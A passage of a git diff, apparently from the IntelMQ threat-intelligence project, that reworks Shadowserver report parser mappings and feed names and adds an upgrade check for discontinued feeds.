-        ('extra.', 'vulnerability_version', validate_to_none),
-        ('extra.', 'threat_framework', validate_to_none),
-        ('extra.', 'threat_tactic_id', validate_to_none),
-        ('extra.', 'threat_technique_id', validate_to_none),
-        ('extra.', 'target_vendor', validate_to_none),
-        ('extra.', 'target_product', validate_to_none),
-        ('extra.', 'target_class', validate_to_none),
-        ('extra.', 'file_md5', validate_to_none),
-        ('extra.', 'file_sha256', validate_to_none),
-        ('extra.', 'request_raw', force_base64),
-        ('extra.', 'body_raw', force_base64),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'essid', validate_to_none),
     ],
     'constant_fields': {
-        'classification.identifier': 'honeypot-http-scan',
-        'classification.taxonomy': 'other',
-        'classification.type': 'other',
-        'protocol.application': 'http',
-    }
+        'classification.identifier': 'accessible-ubiquiti-discovery-service',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/accessible-amqp-report/
-accessible_amqp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-vnc-report/
+scan_vnc = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port')
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'tag'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'channel', convert_int),
-        ('extra.', 'message_length', convert_int),
-        ('extra.', 'class', convert_int),
-        ('extra.', 'method', convert_int),
-        ('extra.', 'version_major', validate_to_none),
-        ('extra.', 'version_minor', validate_to_none),
-        ('extra.', 'capabilities', validate_to_none),
-        ('extra.', 'cluster_name', validate_to_none),
-        ('extra.', 'platform', validate_to_none),
         ('extra.', 'product', validate_to_none),
-        ('extra.', 'product_version', validate_to_none),
-        ('extra.', 'mechanisms', validate_to_none),
-        ('extra.', 'locales', validate_to_none),
+        ('extra.', 'banner', validate_to_none),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-amqp',
-    }
+        'protocol.application': 'vnc',
+        'protocol.transport': 'tcp',
+        'classification.identifier': 'open-vnc',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/device-identification-report/
-device_id = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-xdmcp-service-report/
+scan_xdmcp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port')
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'tag'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'opcode', validate_to_none),
+        ('extra.', 'reported_hostname', validate_to_none),
+        ('extra.', 'status', validate_to_none),
+        ('extra.', 'size', convert_int),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'xdmcp',
+        'classification.identifier': 'open-xdmcp',
+    },
+}
+
+# http://www.shadowserver.org/wiki/pmwiki.php/Services/Spam-URL
+spam_url = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+    ],
+    'optional_fields': [
+        ('source.url', 'url', convert_http_host_and_url, True),
+        ('source.fqdn', 'http_host', validate_fqdn),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sector', validate_to_none),
+        ('extra.', 'source', validate_to_none),
+        ('extra.', 'sender', validate_to_none),
+        ('extra.', 'subject', validate_to_none),
+        ('malware.hash.md5', 'md5', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'abusive-content',
+        'classification.type': 'spam',
+        'classification.identifier': 'spam-url',
+    },
+}
+
+special = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('protocol.transport', 'protocol'),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('malware.name', 'tag'),
+        ('extra.', 'public_source', validate_to_none),
+        ('extra.', 'status', validate_to_none),
+        ('extra.', 'method', validate_to_none),
         ('extra.', 'device_vendor', validate_to_none),
-        ('extra.', 'device_type', validate_to_none),
-        ('extra.', 'device_model', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'other',
-        'classification.type': 'undetermined',
-        'classification.identifier': 'device-id',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'classification.identifier': 'special',
+    },
 }
 
 mapping = (
     # feed name, file name, function
-    ('Accessible-ADB', 'scan_adb', accessible_adb),
-    ('Accessible-AFP', 'scan_afp', accessible_afp),
-    ('Accessible-AMQP', 'scan_amqp', accessible_amqp),
-    ('Accessible-ARD', 'scan_ard', accessible_ard),
-    ('Accessible-CoAP', 'scan_coap', accessible_coap),
-    ('Accessible-CWMP', 'scan_cwmp', accessible_cwmp),
-    ('Accessible-Cisco-Smart-Install', 'cisco_smart_install', accessible_cisco_smart_install),
-    ('Accessible-FTP', 'scan_ftp', accessible_ftp),
-    ('Accessible-HTTP', 'scan_http', accessible_vulnerable_http),
-    ('Accessible-Hadoop', 'scan_hadoop', accessible_hadoop),
-    ('Accessible-MS-RDPEUDP', 'scan_msrdpeudp', accessible_msrdpeudp),  # not used by shadowserver, see line below
-    ('Accessible-RDPEUDP', 'scan_rdpeudp', accessible_msrdpeudp),
-    ('Accessible-Radmin', 'scan_radmin', accessible_radmin),
-    ('Accessible-RDP', 'scan_rdp', accessible_rdp),
-    ('Accessible-Rsync', 'scan_rsync', accessible_rsync),
-    ('Accessible-SMB', 'scan_smb', accessible_smb),
-    ('Accessible-Telnet', 'scan_telnet', accessible_telnet),
-    ('Accessible-Ubiquiti-Discovery-Service', 'scan_ubiquiti', accessible_ubiquiti_discovery_service),
-    ('Accessible-VNC', 'scan_vnc', accessible_vnc),
-    ('Amplification-DDoS-Victim', 'ddos_amplification', amplification_ddos_victim),   # legacy (replaced by honeypot-ddos-amp)
-    ('Blacklisted-IP', 'blacklist', blocklist),
     ('Blocklist', 'blocklist', blocklist),
-    ('CAIDA-IP-Spoofer', 'caida_ip_spoofer', caida),  # legacy (replaced by event4_ip_spoofer)
     ('Compromised-Website', 'compromised_website', compromised_website),
-    ('DNS-Open-Resolvers', 'scan_dns', dns_open_resolvers),
-    ('Darknet', 'darknet', darknet),  # legacy (replaced by event4_honeypot_darknet)
     ('Device-Identification IPv4', 'device_id', device_id),
-    ('Device-Identification IPv6', 'device_id6', device_id),
-    ('Drone', 'botnet_drone', drone),  # legacy (replaced by event4_sinkhole, event4_honeypot_darknet and event46_sinkhole_http)
-    ('Drone-Brute-Force', 'drone_brute_force', drone_brute_force),  # legacy (replaced by honeypot_brute_force)
-    ('HTTP-Scanners', 'hp_http_scan', http_scanners),
-    ('Honeypot-Amplification-DDoS-Events', 'event4_honeypot_ddos_amp', honeypot_ddos_amp),
-    ('Honeypot-Brute-Force-Events', 'event4_honeypot_brute_force', honeypot_brute_force),
-    ('Honeypot-Darknet', 'event4_honeypot_darknet', event4_honeypot_darknet),
-    ('Honeypot-HTTP-Scan', 'event4_honeypot_http_scan', honeypot_http_scan),
-    ('ICS-Scanners', 'hp_ics_scan', ics_scanners),
-    ('IPv6-Sinkhole-HTTP-Drone', 'sinkhole6_http', ipv6_sinkhole_http_drone),  # legacy (replaced by event46_sinkhole_http)
-    ('IP-Spoofer-Events', 'event4_ip_spoofer', event4_ip_spoofer),
-    ('Microsoft-Sinkhole', 'microsoft_sinkhole', microsoft_sinkhole),  # legacy (replaced by event46_sinkhole_http)
-    ('Microsoft-Sinkhole-Events IPv4', 'event4_microsoft_sinkhole', event46_sinkhole),
-    ('Microsoft-Sinkhole-Events-HTTP IPv4', 'event4_microsoft_sinkhole_http', event46_sinkhole_http),
-    ('NTP-Monitor', 'scan_ntpmonitor', ntp_monitor),
-    ('NTP-Version', 'scan_ntp', ntp_version),
-    ('Open-Chargen', 'scan_chargen', open_chargen),
-    ('Open-DB2-Discovery-Service', 'scan_db2', open_db2_discovery_service),
-    ('Open-Elasticsearch', 'scan_elasticsearch', open_elasticsearch),
-    ('Open-IPMI', 'scan_ipmi', open_ipmi),
-    ('Open-IPP', 'scan_ipp', open_ipp),
-    ('Open-LDAP', 'scan_ldap', open_ldap),
-    ('Open-LDAP-TCP', 'scan_ldap_tcp', open_ldap),
-    ('Open-MQTT', 'scan_mqtt', open_mqtt),
-    ('Open-MSSQL', 'scan_mssql', open_mssql),
-    ('Open-Memcached', 'scan_memcached', open_memcached),
-    ('Open-MongoDB', 'scan_mongodb', open_mongodb),
-    ('Open-NATPMP', 'scan_nat_pmp', open_natpmp),
-    ('Open-NetBIOS-Nameservice', 'scan_netbios', open_netbios_nameservice),
-    ('Open-Netis', 'netis_router', open_netis),
-    ('Open-Portmapper', 'scan_portmapper', open_portmapper),
-    ('Open-QOTD', 'scan_qotd', open_qotd),
-    ('Open-Redis', 'scan_redis', open_redis),
-    ('Open-SNMP', 'scan_snmp', open_snmp),
-    ('Open-SSDP', 'scan_ssdp', open_ssdp),
-    ('Open-TFTP', 'scan_tftp', open_tftp),
-    ('Open-XDMCP', 'scan_xdmcp', open_xdmcp),
-    ('Open-mDNS', 'scan_mdns', open_mdns),
-    ('Outdated-DNSSEC-Key', 'outdated_dnssec_key', outdated_dnssec_key),
-    ('Outdated-DNSSEC-Key-IPv6', 'outdated_dnssec_key_v6', outdated_dnssec_key),
-    ('SSL-FREAK-Vulnerable-Servers', 'scan_ssl_freak', ssl_freak_vulnerable_servers),
-    ('SSL-POODLE-Vulnerable-Servers IPv4', 'scan_ssl_poodle', ssl_poodle46_vulnerable_servers),
-    ('SSL-POODLE-Vulnerable-Servers IPv6', 'scan6_ssl_poodle', ssl_poodle46_vulnerable_servers),
-    ('Sandbox-URL', 'cwsandbox_url', sandbox_url),
-    ('Sinkhole-DNS', 'sinkhole_dns', sinkhole_dns),
-    ('Sinkhole-Events', 'event4_sinkhole', event46_sinkhole),
-    ('Sinkhole-Events IPv4', 'event4_sinkhole', event46_sinkhole),
-    ('Sinkhole-Events IPv6', 'event6_sinkhole', event46_sinkhole),
-    ('Sinkhole-Events-HTTP', 'event4_sinkhole_http', event46_sinkhole_http),
-    ('Sinkhole-Events-HTTP IPv4', 'event4_sinkhole_http', event46_sinkhole_http),
-    ('Sinkhole-Events-HTTP IPv6', 'event6_sinkhole_http', event46_sinkhole_http),
-    ('Sinkhole-HTTP-Drone', 'sinkhole_http_drone', sinkhole_http_drone),  # legacy (replaced by event46_sinkhole_http)
-    ('Sinkhole-Events-HTTP-Referer', 'event4_sinkhole_http_referer', event46_sinkhole_http_referer),
-    ('Sinkhole-Events-HTTP-Referer IPv4', 'event4_sinkhole_http_referer', event46_sinkhole_http_referer),
-    ('Sinkhole-Events-HTTP-Referer IPv6', 'event6_sinkhole_http_referer', event46_sinkhole_http_referer),
-    ('Spam-URL', 'spam_url', spam_url),
-    ('Vulnerable-ISAKMP', 'scan_isakmp', vulnerable_isakmp),
-    ('Vulnerable-HTTP', 'scan_http_vulnerable', accessible_vulnerable_http),
+    ('Device-Identification IPv6', 'device_id6', device_id6),
+    ('Honeypot-Brute-Force-Events', 'event4_honeypot_brute_force', event_honeypot_brute_force),
+    ('Honeypot-Darknet', 'event4_honeypot_darknet', event_honeypot_darknet),
+    ('Honeypot-DDoS', 'event4_honeypot_ddos', event_honeypot_ddos),
+    ('Honeypot-Amplification-DDoS-Events', 'event4_honeypot_ddos_amp', event_honeypot_ddos_amp),
+    ('Honeypot-DDoS-Target', 'event4_honeypot_ddos_target', event_honeypot_ddos_target),
+    ('Honeypot-HTTP-Scan', 'event4_honeypot_http_scan', event_honeypot_http_scan),
+    ('Honeypot-ICS-Scanner', 'event4_honeypot_ics_scan', event_honeypot_ics_scan),
+    ('IP-Spoofer-Events', 'event4_ip_spoofer', event_ip_spoofer),
+    ('Microsoft-Sinkhole-Events IPv4', 'event4_microsoft_sinkhole', event_sinkhole),
+    ('Microsoft-Sinkhole-Events-HTTP IPv4', 'event4_microsoft_sinkhole_http', event_sinkhole_http),
+    ('Sinkhole-Events IPv4', 'event4_sinkhole', event_sinkhole),
+    ('Sinkhole-DNS', 'event4_sinkhole_dns', event_sinkhole_dns),
+    ('Sinkhole-Events-HTTP IPv4', 'event4_sinkhole_http', event_sinkhole_http),
+    ('Sinkhole-Events-HTTP-Referer IPv4', 'event4_sinkhole_http_referer', event_sinkhole_http_referer),
+    ('Sinkhole-Events IPv6', 'event6_sinkhole', event_sinkhole),
+    ('Sinkhole-Events-HTTP IPv6', 'event6_sinkhole_http', event_sinkhole_http),
+    ('Sinkhole-Events-HTTP-Referer IPv6', 'event6_sinkhole_http_referer', event_sinkhole_http_referer),
+    ('Malware-URL', 'malware_url', malware_url),
+    ('Phish-URL', 'phish_url', phish_url),
+    ('Sandbox-Connections', 'sandbox_conn', sandbox_conn),
+    ('Sandbox-DNS', 'sandbox_dns', sandbox_dns),
+    ('Sandbox-URL', 'sandbox_url', sandbox_url),
+    ('IPv6-Accessible-CWMP', 'scan6_cwmp', scan_cwmp),
+    ('IPv6-Accessible-FTP', 'scan6_ftp', scan_ftp),
+    ('IPv6-Accessible-HTTP', 'scan6_http', scan_http),
+    ('IPv6-Vulnerable-HTTP', 'scan6_http_vulnerable', scan_http_vulnerable),
+    ('IPv6-Open-MQTT', 'scan6_mqtt', scan_mqtt),
+    ('IPv6-Open-Anonymous-MQTT', 'scan6_mqtt_anon', scan_mqtt_anon),
+    ('IPv6-Accessible-MySQL', 'scan6_mysql', scan_mysql),
+    ('IPv6-Accessible-PostgreSQL', 'scan6_postgres', scan_postgres),
+    ('IPv6-Accessible-RDP', 'scan6_rdp', scan_rdp),
+    ('IPv6-Accessible-SMB', 'scan6_smb', scan_smb),
+    ('IPv6-Accessible-SMTP', 'scan6_smtp', scan_smtp),
+    ('IPv6-Vulnerable-SMTP', 'scan6_smtp_vulnerable', scan_smtp_vulnerable),
+    ('IPv6-Open-SNMP', 'scan6_snmp', scan_snmp),
+    ('IPv6-Accessible-SSH', 'scan6_ssh', scan_ssh),
+    ('IPv6-Accessible-SSL', 'scan6_ssl', scan_ssl),
+    ('SSL-FREAK-Vulnerable-Servers IPv6', 'scan6_ssl_freak', scan_ssl_freak),
+    ('SSL-POODLE-Vulnerable-Servers IPv6', 'scan6_ssl_poodle', scan_ssl_poodle),
+    ('IPv6-Accessible-Telnet', 'scan6_telnet', scan_telnet),
+    ('IPv6-Accessible-VNC', 'scan6_vnc', scan_vnc),
+    ('Accessible-ADB', 'scan_adb', scan_adb),
+    ('Accessible-AFP', 'scan_afp', scan_afp),
+    ('Accessible-AMQP', 'scan_amqp', scan_amqp),
+    ('Accessible-ARD', 'scan_ard', scan_ard),
+    ('Open-Chargen', 'scan_chargen', scan_chargen),
+    ('Accessible-Cisco-Smart-Install', 'scan_cisco_smart_install', scan_cisco_smart_install),
+    ('Accessible-CoAP', 'scan_coap', scan_coap),
+    ('Accessible-CouchDB', 'scan_couchdb', scan_couchdb),
+    ('Accessible-CWMP', 'scan_cwmp', scan_cwmp),
+    ('Open-DB2-Discovery-Service', 'scan_db2', scan_db2),
+    ('Vulnerable-DDoS-Middlebox', 'scan_ddos_middlebox', scan_ddos_middlebox),
+    ('DNS-Open-Resolvers', 'scan_dns', scan_dns),
+    ('Accessible-Docker', 'scan_docker', scan_docker),
+    ('Accessible-DVR-DHCPDiscover', 'scan_dvr_dhcpdiscover', scan_dvr_dhcpdiscover),
+    ('Open-Elasticsearch', 'scan_elasticsearch', scan_elasticsearch),
+    ('Accessible-Erlang-Port-Mapper-Daemon', 'scan_epmd', scan_epmd),
     ('Vulnerable-Exchange-Server', 'scan_exchange', scan_exchange),
-    ('Vulnerable-SMTP', 'scan_smtp_vulnerable', vulnerable_smtp),
+    ('Accessible-FTP', 'scan_ftp', scan_ftp),
+    ('Accessible-Hadoop', 'scan_hadoop', scan_hadoop),
+    ('Accessible-HTTP', 'scan_http', scan_http),
+    ('Vulnerable-HTTP', 'scan_http_vulnerable', scan_http_vulnerable),
+    ('Accessible-ICS', 'scan_ics', scan_ics),
+    ('Open-IPMI', 'scan_ipmi', scan_ipmi),
+    ('Open-IPP', 'scan_ipp', scan_ipp),
+    ('Vulnerable-ISAKMP', 'scan_isakmp', scan_isakmp),
+    ('Accessible-Kubernetes-API', 'scan_kubernetes', scan_kubernetes),
+    ('Open-LDAP-TCP', 'scan_ldap_tcp', scan_ldap_tcp),
+    ('Open-LDAP', 'scan_ldap_udp', scan_ldap_udp),
+    ('Open-mDNS', 'scan_mdns', scan_mdns),
+    ('Open-Memcached', 'scan_memcached', scan_memcached),
+    ('Open-MongoDB', 'scan_mongodb', scan_mongodb),
+    ('Open-MQTT', 'scan_mqtt', scan_mqtt),
+    ('Open-Anonymous-MQTT', 'scan_mqtt_anon', scan_mqtt_anon),
+    ('Open-MSSQL', 'scan_mssql', scan_mssql),
+    ('Accessible-MySQL', 'scan_mysql', scan_mysql),
+    ('Open-NATPMP', 'scan_nat_pmp', scan_nat_pmp),
+    ('Open-NetBIOS-Nameservice', 'scan_netbios', scan_netbios),
+    ('Open-Netis', 'scan_netis_router', scan_netis_router),
+    ('NTP-Version', 'scan_ntp', scan_ntp),
+    ('NTP-Monitor', 'scan_ntpmonitor', scan_ntpmonitor),
+    ('Open-Portmapper', 'scan_portmapper', scan_portmapper),
+    ('Accessible-PostgreSQL', 'scan_postgres', scan_postgres),
+    ('Open-QOTD', 'scan_qotd', scan_qotd),
+    ('Accessible-QUIC', 'scan_quic', scan_quic),
+    ('Accessible-Radmin', 'scan_radmin', scan_radmin),
+    ('Accessible-RDP', 'scan_rdp', scan_rdp),
+    ('Accessible-MS-RDPEUDP', 'scan_rdpeudp', scan_rdpeudp),
+    ('Open-Redis', 'scan_redis', scan_redis),
+    ('Accessible-Rsync', 'scan_rsync', scan_rsync),
+    ('Accessible-SMB', 'scan_smb', scan_smb),
+    ('Accessible-SMTP', 'scan_smtp', scan_smtp),
+    ('Vulnerable-SMTP', 'scan_smtp_vulnerable', scan_smtp_vulnerable),
+    ('Open-SNMP', 'scan_snmp', scan_snmp),
+    ('Accessible-SOCKS4/5-Proxy', 'scan_socks', scan_socks),
+    ('Open-SSDP', 'scan_ssdp', scan_ssdp),
+    ('Accessible-SSH', 'scan_ssh', scan_ssh),
+    ('Accessible-SSL', 'scan_ssl', scan_ssl),
+    ('SSL-FREAK-Vulnerable-Servers', 'scan_ssl_freak', scan_ssl_freak),
+    ('SSL-POODLE-Vulnerable-Servers IPv4', 'scan_ssl_poodle', scan_ssl_poodle),
+    ('SYNful-Knock', 'scan_synfulknock', scan_synfulknock),
+    ('Accessible-Telnet', 'scan_telnet', scan_telnet),
+    ('Open-TFTP', 'scan_tftp', scan_tftp),
+    ('Accessible-Ubiquiti-Discovery-Service', 'scan_ubiquiti', scan_ubiquiti),
+    ('Accessible-VNC', 'scan_vnc', scan_vnc),
+    ('Open-XDMCP', 'scan_xdmcp', scan_xdmcp),
+    ('Spam-URL', 'spam_url', spam_url),
+    ('Special', 'special', special),
+    ('Accessible-RDPEUDP', 'scan_rdpeudp', scan_rdpeudp),
+    ('Sinkhole-Events', 'event4_sinkhole', event_sinkhole),
+    ('Sinkhole-Events-HTTP', 'event4_sinkhole_http', event_sinkhole_http),
+    ('Sinkhole-Events-HTTP-Referer', 'event4_sinkhole_http_referer', event_sinkhole_http_referer),
 )
+# END CONFGEN
 
 feedname_mapping = {feedname: function for feedname, filename, function in mapping}
 filename_mapping = {filename: (feedname, function) for feedname, filename, function in mapping}
diff --git a/intelmq/bots/parsers/shadowserver/parser.py b/intelmq/bots/parsers/shadowserver/parser.py
index 67da8ea29..51fc9b41c 100644
--- a/intelmq/bots/parsers/shadowserver/parser.py
+++ b/intelmq/bots/parsers/shadowserver/parser.py
@@ -85,10 +85,6 @@ def parse_line(self, row, report):
 
         conf = self._sparser_config
 
-        # https://github.com/certtools/intelmq/issues/1271
-        if conf == config.drone and row.get('infection') == 'spam':
-            conf = config.drone_spam
-
         # we need to copy here...
         fields = copy.copy(self.csv_fieldnames)
         # We will use this variable later.
diff --git a/intelmq/lib/test.py b/intelmq/lib/test.py
index f98007cf1..d7b27eb4c 100644
--- a/intelmq/lib/test.py
+++ b/intelmq/lib/test.py
@@ -46,7 +46,7 @@
               }
 
 
-class Parameters:
+class Parameters(object):
     pass
 
 
@@ -63,7 +63,7 @@ def mocked(conf_file):
             confname = os.path.join('etc/', os.path.split(conf_file)[-1])
             fname = pkg_resources.resource_filename('intelmq',
                                                     confname)
-            with open(fname) as fpconfig:
+            with open(fname, 'rt') as fpconfig:
                 return json.load(fpconfig)
         else:
             return utils.load_configuration(conf_file)
@@ -105,7 +105,7 @@ def skip_build_environment():
     return unittest.skipIf(os.getenv('USER') == 'abuild', 'Test disabled in Build Service.')
 
 
-class BotTestCase:
+class BotTestCase(object):
     """
     Provides common tests and assert methods for bot testing.
     """
@@ -199,11 +199,12 @@ def prepare_bot(self, parameters={}, destination_queues=None, prepare_source_que
         """
         self.log_stream = io.StringIO()
 
-        src_name = f"{self.bot_id}-input"
+        src_name = "{}-input".format(self.bot_id)
         if not destination_queues:
-            destination_queues = {"_default": f"{self.bot_id}-output"}
+            destination_queues = {"_default": "{}-output".format(self.bot_id)}
         else:
-            destination_queues = {queue_name: f"{self.bot_id}-{queue_name.strip('_')}-output"
+            destination_queues = {queue_name: "%s-%s-output" % (self.bot_id,
+                                                                queue_name.strip('_'))
                                   for queue_name in destination_queues}
 
         config = BOT_CONFIG.copy()
@@ -283,7 +284,7 @@ def test_static_bot_check_method(self, *args, **kwargs):
             self.assertNotEqual(check[0].upper(), 'ERROR',
                                 '%s.check returned the error %r.'
                                 '' % (self.bot_name, check[1]))
-        raise ValueError(f'checks is {checks!r}')
+        raise ValueError('checks is %r' % (checks, ))
 
     def run_bot(self, iterations: int = 1, error_on_pipeline: bool = False,
                 prepare=True, parameters={},
@@ -350,7 +351,7 @@ def run_bot(self, iterations: int = 1, error_on_pipeline: bool = False,
 
         """ Test if bot log messages are correctly formatted. """
         self.assertLoglineMatches(0, "{} initialized with id {} and intelmq [0-9a-z.]* and python"
-                                     r" [0-9a-z.]{{5,8}}\+? \(.+?\)( \[GCC.*?\])?"
+                                     r" [0-9a-z.]{{5,8}}\+? \([a-zA-Z0-9,:. ]+\)( \[GCC\])?"
                                      r" as process [0-9]+\."
                                      "".format(self.bot_name,
                                                self.bot_id), "INFO")
@@ -424,7 +425,7 @@ def test_bot_name(self, *args, **kwargs):
         for type_name, type_match in self.bot_types.items():
             try:
                 self.assertRegex(self.bot_name,
-                                 fr'\A[a-zA-Z0-9]+{type_match}\Z')
+                                 r'\A[a-zA-Z0-9]+{}\Z'.format(type_match))
             except AssertionError:
                 counter += 1
         if counter != len(self.bot_types) - 1:
diff --git a/intelmq/lib/upgrades.py b/intelmq/lib/upgrades.py
index ca250df0c..e9404165c 100644
--- a/intelmq/lib/upgrades.py
+++ b/intelmq/lib/upgrades.py
@@ -37,6 +37,7 @@
            'v300_pipeline_file_removal',
            'v301_deprecations',
            'v310_feed_changes',
+           'v310_shadowserver_feednames',
            ]
 
 
@@ -726,6 +727,36 @@ def v301_deprecations(configuration, harmonization, dry_run, **kwargs):
     return messages + ' Remove affected bots yourself.' if messages else changed, configuration, harmonization
 
 
+def v310_shadowserver_feednames(configuration, harmonization, dry_run, **kwargs):
+    """
+    Remove legacy Shadowserver feednames
+    """
+    legacy = {
+        'Amplification-DDoS-Victim': 1,
+        'Blacklisted-IP': 1,
+        'CAIDA-IP-Spoofer': 1,
+        'Darknet': 1,
+        'Drone': 1,
+        'Drone-Brute-Force': 1,
+        'HTTP-Scanners': 1,
+        'ICS-Scanners': 1,
+        'IPv6-Sinkhole-HTTP-Drone': 1,
+        'Microsoft-Sinkhole': 1,
+        'Outdated-DNSSEC-Key': 1,
+        'Outdated-DNSSEC-Key-IPv6': 1,
+        'Sinkhole-HTTP-Drone': 1
+    }
+    changed = None
+    names = []
+    for bot_id, bot in configuration.items():
+        if bot_id == 'global':
+            continue
+        if bot["module"] == "intelmq.bots.parsers.shadowserver.parser":
+            if bot["parameters"]["feedname"] in legacy:
+                names.append(bot["parameters"]["feedname"])
+    return 'A discontinued feed has been found and must be removed %s' % ', '.join(names) if names else changed, configuration, harmonization
+
+
 def v310_feed_changes(configuration, harmonization, dry_run, **kwargs):
     """
     Migrates feeds' configuration for changed/fixed parameter
@@ -771,7 +802,7 @@ def v310_feed_changes(configuration, harmonization, dry_run, **kwargs):
     ((3, 0, 0), (v300_bots_file_removal, v300_defaults_file_removal, v300_pipeline_file_removal, )),
     ((3, 0, 1), (v301_deprecations, )),
     ((3, 0, 2), ()),
-    ((3, 1, 0), (v310_feed_changes, )),
+    ((3, 1, 0), (v310_feed_changes, v310_shadowserver_feednames, )),
 ])
 
 ALWAYS = (harmonization, )
diff --git a/intelmq/tests/bots/collectors/shadowserver/README.md b/intelmq/tests/bots/collectors/shadowserver/README.md
new file mode 100644
index 000000000..eb0ddfb4a
--- /dev/null
+++ b/intelmq/tests/bots/collectors/shadowserver/README.md
@@ -0,0 +1,9 @@
+<!--
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
+-->
+
+This module is maintained by [The Shadowserver Foundation](https://www.shadowserver.org/).  
+
+Please contact intelmq@shadowserver.org with any issues or concerns.
+
diff --git a/intelmq/tests/bots/collectors/shadowserver/test_collector_reports_api.py b/intelmq/tests/bots/collectors/shadowserver/test_collector_reports_api.py
index 0da35b7ef..a625c9d34 100644
--- a/intelmq/tests/bots/collectors/shadowserver/test_collector_reports_api.py
+++ b/intelmq/tests/bots/collectors/shadowserver/test_collector_reports_api.py
@@ -13,7 +13,7 @@
 
 RANDSTR = secrets.token_urlsafe(50)
 ASSET_PATH = pathlib.Path(__file__).parent / 'reports-list.json'
-PARAMETERS = {'country': 'anarres', 'api_key': RANDSTR, 'secret': RANDSTR, 'logging_level': 'DEBUG', 'types': ['scan_smb', 'cisco_smart_install', 'nonexistent'], 'name': 'shadowservercollector'}
+PARAMETERS = {'reports': 'anarres', 'api_key': RANDSTR, 'secret': RANDSTR, 'logging_level': 'DEBUG', 'types': ['scan_smb', 'cisco_smart_install', 'nonexistent'], 'name': 'shadowservercollector'}
 REPORT = {'__type': 'Report', 'extra.file_name': '2020-08-02-scan_smb-anarres-geo.json', 'feed.accuracy': 100.0, 'feed.name': 'shadowservercollector', 'raw': 'e30='}
 
 
@@ -49,11 +49,11 @@ def test_faulty_config_0(self, mocker):
         self.assertEqual(str(exception), 'No secret provided.')
 
     def test_faulty_config_1(self, mocker):
-        parameters = {'api_key': RANDSTR, 'secret': RANDSTR}
+        parameters = {'secret': RANDSTR}
         with self.assertRaises(ValueError) as context:
             self.run_bot(iterations=1, parameters=parameters)
         exception = context.exception
-        self.assertEqual(str(exception), 'No country provided.')
+        self.assertEqual(str(exception), 'No api_key provided.')
 
     def test_empty_response(self, mocker):
         mocker.post('https://transform.shadowserver.org/api2/reports/list', text='{}')
diff --git a/intelmq/tests/bots/parsers/shadowserver/README.md b/intelmq/tests/bots/parsers/shadowserver/README.md
index cf3584454..b96349a70 100644
--- a/intelmq/tests/bots/parsers/shadowserver/README.md
+++ b/intelmq/tests/bots/parsers/shadowserver/README.md
@@ -1,4 +1,5 @@
 <!--
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
 SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
 
 SPDX-License-Identifier: AGPL-3.0-or-later
@@ -14,3 +15,8 @@ each type of report, there are also the following tests:
 * `test_broken.py`: to test errors in the parser
 * `test_testdata.py`: to test if the parsing of large original files
 * `test_parameters.py`: to test the bot's parameters
+
+This module is maintained by [The Shadowserver Foundation](https://www.shadowserver.org/).  
+
+Please contact intelmq@shadowserver.org with any issues or concerns.
+
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_msrdpeudp.csv.license b/intelmq/tests/bots/parsers/shadowserver/scan_rdpeudp.csv.license
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/scan_msrdpeudp.csv.license
